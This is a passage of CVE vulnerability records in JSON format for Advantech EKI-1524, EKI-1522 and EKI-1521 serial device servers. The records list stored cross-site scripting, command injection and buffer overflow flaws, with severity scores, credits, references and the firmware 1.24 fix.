"product": "eki-1522",
"vendor": "advantech",
"versions": [
{
"lessThan": "1.24",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:h:advantech:eki-1521:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unaffected",
"product": "eki-1521",
"vendor": "advantech",
"versions": [
{
"lessThan": "1.24",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-4203",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-10-10T17:43:49.048482Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-10-10T17:46:07.494Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "EKI-1524",
"vendor": "Advantech",
"versions": [
{
"lessThanOrEqual": "1.24",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "EKI-1522",
"vendor": "Advantech",
"versions": [
{
"lessThanOrEqual": "1.24",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "EKI-1521",
"vendor": "Advantech",
"versions": [
{
"lessThanOrEqual": "1.24",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"user": "00000000-0000-4000-9000-000000000000",
"value": "R. Haas"
},
{
"lang": "en",
"type": "finder",
"user": "00000000-0000-4000-9000-000000000000",
"value": "A. Resanovic"
},
{
"lang": "en",
"type": "finder",
"user": "00000000-0000-4000-9000-000000000000",
"value": "T. Etzenberger"
},
{
"lang": "en",
"type": "finder",
"user": "00000000-0000-4000-9000-000000000000",
"value": "M. Bineder"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cspan style=\"background-color: rgb(252, 252, 252);\"\u003eAdvantech EKI-1524, EKI-1522, EKI-1521 devices through 1.21 are affected by a Stored Cross-Site Scripting vulnerability, which can be triggered by authenticated users in the ping tool of the web-interface.\u003c/span\u003e\u003cbr\u003e"
}
],
"value": "Advantech EKI-1524, EKI-1522, EKI-1521 devices through 1.21 are affected by a Stored Cross-Site Scripting vulnerability, which can be triggered by authenticated users in the ping tool of the web-interface.\n"
}
],
"impacts": [
{
"capecId": "CAPEC-63",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-63 Cross-Site Scripting (XSS)"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79 Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-08-08T10:29:21.163Z",
"orgId": "7d092a75-6bbd-48c6-a15a-0297458009bc",
"shortName": "CyberDanube"
},
"references": [
{
"url": "https://cyberdanube.com/en/en-st-polten-uas-multiple-vulnerabilities-in-advantech-eki-15xx-series/"
},
{
"url": "http://seclists.org/fulldisclosure/2023/Aug/13"
},
{
"url": "http://packetstormsecurity.com/files/174153/Advantech-EKI-1524-CE-EKI-1522-EKI-1521-Cross-Site-Scripting.html"
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "Stored Cross-Site Scripting",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "7d092a75-6bbd-48c6-a15a-0297458009bc",
"assignerShortName": "CyberDanube",
"cveId": "CVE-2023-4203",
"datePublished": "2023-08-08T10:29:21.163Z",
"dateReserved": "2023-08-07T10:45:06.312Z",
"dateUpdated": "2024-10-10T17:46:07.494Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2023-2574
Vulnerability from cvelistv5
Published
2023-05-08 12:28
Modified
2024-08-02 06:26
Severity ?
EPSS score ?
Summary
Authenticated Command Injection
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T06:26:09.703Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"patch",
"x_transferred"
],
"url": "https://www.advantech.com/en/support/details/firmware?id=1-1J9BED3"
},
{
"tags": [
"patch",
"x_transferred"
],
"url": "https://www.advantech.com/en/support/details/firmware?id=1-1J9BEBL"
},
{
"tags": [
"patch",
"x_transferred"
],
"url": "https://www.advantech.com/en/support/details/firmware?id=1-1J9BECT"
},
{
"tags": [
"third-party-advisory",
"x_transferred"
],
"url": "https://cyberdanube.com/en/multiple-vulnerabilities-in-advantech-eki-15xx-series/"
},
{
"tags": [
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2023/May/4"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/172307/Advantech-EKI-15XX-Series-Command-Injection-Buffer-Overflow.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "EKI-1524",
"vendor": "Advantech",
"versions": [
{
"lessThanOrEqual": "1.21",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "EKI-1522",
"vendor": "Advantech",
"versions": [
{
"lessThanOrEqual": "1.21",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "EKI-1521",
"vendor": "Advantech",
"versions": [
{
"lessThanOrEqual": "1.21",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"user": "00000000-0000-4000-9000-000000000000",
"value": "S. Dietz (CyberDanube)"
},
{
"lang": "en",
"type": "finder",
"user": "00000000-0000-4000-9000-000000000000",
"value": "T. Weber (CyberDanube)"
}
],
"datePublic": "2023-05-10T12:23:00.000Z",
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cspan style=\"background-color: rgb(252, 252, 252);\"\u003eAdvantech EKI-1524, EKI-1522, EKI-1521 devices through 1.21 are affected by an command injection vulnerability in the device name input field, which can be triggered by authenticated users via a crafted POST request.\u003c/span\u003e\u003cbr\u003e"
}
],
"value": "Advantech EKI-1524, EKI-1522, EKI-1521 devices through 1.21 are affected by an command injection vulnerability in the device name input field, which can be triggered by authenticated users via a crafted POST request.\n"
}
],
"impacts": [
{
"capecId": "CAPEC-88",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-88 OS Command Injection"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-78",
"description": "CWE-78 Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-05-11T11:14:52.701Z",
"orgId": "7d092a75-6bbd-48c6-a15a-0297458009bc",
"shortName": "CyberDanube"
},
"references": [
{
"tags": [
"patch"
],
"url": "https://www.advantech.com/en/support/details/firmware?id=1-1J9BED3"
},
{
"tags": [
"patch"
],
"url": "https://www.advantech.com/en/support/details/firmware?id=1-1J9BEBL"
},
{
"tags": [
"patch"
],
"url": "https://www.advantech.com/en/support/details/firmware?id=1-1J9BECT"
},
{
"tags": [
"third-party-advisory"
],
"url": "https://cyberdanube.com/en/multiple-vulnerabilities-in-advantech-eki-15xx-series/"
},
{
"url": "http://seclists.org/fulldisclosure/2023/May/4"
},
{
"url": "http://packetstormsecurity.com/files/172307/Advantech-EKI-15XX-Series-Command-Injection-Buffer-Overflow.html"
}
],
"solutions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "Install firmware 1.24 to fix the issue."
}
],
"value": "Install firmware 1.24 to fix the issue."
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "Authenticated Command Injection",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "7d092a75-6bbd-48c6-a15a-0297458009bc",
"assignerShortName": "CyberDanube",
"cveId": "CVE-2023-2574",
"datePublished": "2023-05-08T12:28:59.918Z",
"dateReserved": "2023-05-08T11:13:35.330Z",
"dateUpdated": "2024-08-02T06:26:09.703Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2023-2575
Vulnerability from cvelistv5
Published
2023-05-08 12:11
Modified
2024-08-02 06:26
Severity ?
EPSS score ?
Summary
Authenticated Buffer Overflow
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T06:26:09.906Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"patch",
"x_transferred"
],
"url": "https://www.advantech.com/en/support/details/firmware?id=1-1J9BED3"
},
{
"tags": [
"patch",
"x_transferred"
],
"url": "https://www.advantech.com/en/support/details/firmware?id=1-1J9BEBL"
},
{
"tags": [
"patch",
"x_transferred"
],
"url": "https://www.advantech.com/en/support/details/firmware?id=1-1J9BECT"
},
{
"tags": [
"third-party-advisory",
"x_transferred"
],
"url": "https://cyberdanube.com/en/multiple-vulnerabilities-in-advantech-eki-15xx-series/"
},
{
"tags": [
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2023/May/4"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/172307/Advantech-EKI-15XX-Series-Command-Injection-Buffer-Overflow.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "EKI-1524",
"vendor": "Advantech",
"versions": [
{
"lessThanOrEqual": "1.21",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "EKI-1522",
"vendor": "Advantech",
"versions": [
{
"lessThanOrEqual": "1.21",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "EKI-1521",
"vendor": "Advantech",
"versions": [
{
"lessThanOrEqual": "1.21",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"user": "00000000-0000-4000-9000-000000000000",
"value": "S. Dietz (CyberDanube)"
},
{
"lang": "en",
"type": "finder",
"user": "00000000-0000-4000-9000-000000000000",
"value": "T. Weber (CyberDanube)"
}
],
"datePublic": "2023-05-11T07:00:00.000Z",
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "Advantech EKI-1524, EKI-1522, EKI-1521 devices through 1.21 are affected by a\u0026nbsp;\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eStack-based Buffer Overflow vulnerability, which can be triggered by authenticated\u003c/span\u003e\u0026nbsp;users via a crafted POST request."
}
],
"value": "Advantech EKI-1524, EKI-1522, EKI-1521 devices through 1.21 are affected by a\u00a0Stack-based Buffer Overflow vulnerability, which can be triggered by authenticated\u00a0users via a crafted POST request."
}
],
"impacts": [
{
"capecId": "CAPEC-100",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-100 Overflow Buffers"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-121",
"description": "CWE-121: Stack-based Buffer Overflow",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-05-11T11:15:12.646Z",
"orgId": "7d092a75-6bbd-48c6-a15a-0297458009bc",
"shortName": "CyberDanube"
},
"references": [
{
"tags": [
"patch"
],
"url": "https://www.advantech.com/en/support/details/firmware?id=1-1J9BED3"
},
{
"tags": [
"patch"
],
"url": "https://www.advantech.com/en/support/details/firmware?id=1-1J9BEBL"
},
{
"tags": [
"patch"
],
"url": "https://www.advantech.com/en/support/details/firmware?id=1-1J9BECT"
},
{
"tags": [
"third-party-advisory"
],
"url": "https://cyberdanube.com/en/multiple-vulnerabilities-in-advantech-eki-15xx-series/"
},
{
"url": "http://seclists.org/fulldisclosure/2023/May/4"
},
{
"url": "http://packetstormsecurity.com/files/172307/Advantech-EKI-15XX-Series-Command-Injection-Buffer-Overflow.html"
}
],
"solutions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "Install firmware 1.24 to fix the issue."
}
],
"value": "Install firmware 1.24 to fix the issue."
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "Authenticated Buffer Overflow",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "7d092a75-6bbd-48c6-a15a-0297458009bc",
"assignerShortName": "CyberDanube",
"cveId": "CVE-2023-2575",
"datePublished": "2023-05-08T12:11:34.963Z",
"dateReserved": "2023-05-08T11:13:38.539Z",
"dateUpdated": "2024-08-02T06:26:09.906Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2023-2573
Vulnerability from cvelistv5
Published
2023-05-08 12:33
Modified
2024-08-02 06:26
Severity ?
EPSS score ?
Summary
Authenticated Command Injection
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T06:26:09.816Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"patch",
"x_transferred"
],
"url": "https://www.advantech.com/en/support/details/firmware?id=1-1J9BED3"
},
{
"tags": [
"patch",
"x_transferred"
],
"url": "https://www.advantech.com/en/support/details/firmware?id=1-1J9BEBL"
},
{
"tags": [
"patch",
"x_transferred"
],
"url": "https://www.advantech.com/en/support/details/firmware?id=1-1J9BECT"
},
{
"tags": [
"third-party-advisory",
"x_transferred"
],
"url": "https://cyberdanube.com/en/multiple-vulnerabilities-in-advantech-eki-15xx-series/"
},
{
"tags": [
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2023/May/4"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/172307/Advantech-EKI-15XX-Series-Command-Injection-Buffer-Overflow.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "EKI-1524",
"vendor": "Advantech",
"versions": [
{
"lessThanOrEqual": "1.21",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "EKI-1522",
"vendor": "Advantech",
"versions": [
{
"lessThanOrEqual": "1.21",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "EKI-1521",
"vendor": "Advantech",
"versions": [
{
"lessThanOrEqual": "1.21",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"user": "00000000-0000-4000-9000-000000000000",
"value": "S. Dietz (CyberDanube)"
},
{
"lang": "en",
"type": "finder",
"user": "00000000-0000-4000-9000-000000000000",
"value": "T. Weber (CyberDanube)"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cdiv\u003e\u003cp\u003eAdvantech EKI-1524, EKI-1522, EKI-1521 devices through 1.21 are affected by an command injection vulnerability in the NTP server input field, which can be triggered by authenticated users via a crafted POST request.\u003c/p\u003e\u003c/div\u003e"
}
],
"value": "Advantech EKI-1524, EKI-1522, EKI-1521 devices through 1.21 are affected by an command injection vulnerability in the NTP server input field, which can be triggered by authenticated users via a crafted POST request.\n\n\n\n"
}
],
"impacts": [
{
"capecId": "CAPEC-88",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-88 OS Command Injection"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-78",
"description": "CWE-78 Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-05-11T11:14:33.348Z",
"orgId": "7d092a75-6bbd-48c6-a15a-0297458009bc",
"shortName": "CyberDanube"
},
"references": [
{
"tags": [
"patch"
],
"url": "https://www.advantech.com/en/support/details/firmware?id=1-1J9BED3"
},
{
"tags": [
"patch"
],
"url": "https://www.advantech.com/en/support/details/firmware?id=1-1J9BEBL"
},
{
"tags": [
"patch"
],
"url": "https://www.advantech.com/en/support/details/firmware?id=1-1J9BECT"
},
{
"tags": [
"third-party-advisory"
],
"url": "https://cyberdanube.com/en/multiple-vulnerabilities-in-advantech-eki-15xx-series/"
},
{
"url": "http://seclists.org/fulldisclosure/2023/May/4"
},
{
"url": "http://packetstormsecurity.com/files/172307/Advantech-EKI-15XX-Series-Command-Injection-Buffer-Overflow.html"
}
],
"solutions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "Install firmware 1.24 to fix the issue."
}
],
"value": "Install firmware 1.24 to fix the issue."
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "Authenticated Command Injection",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "7d092a75-6bbd-48c6-a15a-0297458009bc",
"assignerShortName": "CyberDanube",
"cveId": "CVE-2023-2573",
"datePublished": "2023-05-08T12:33:06.707Z",
"dateReserved": "2023-05-08T11:13:17.725Z",
"dateUpdated": "2024-08-02T06:26:09.816Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}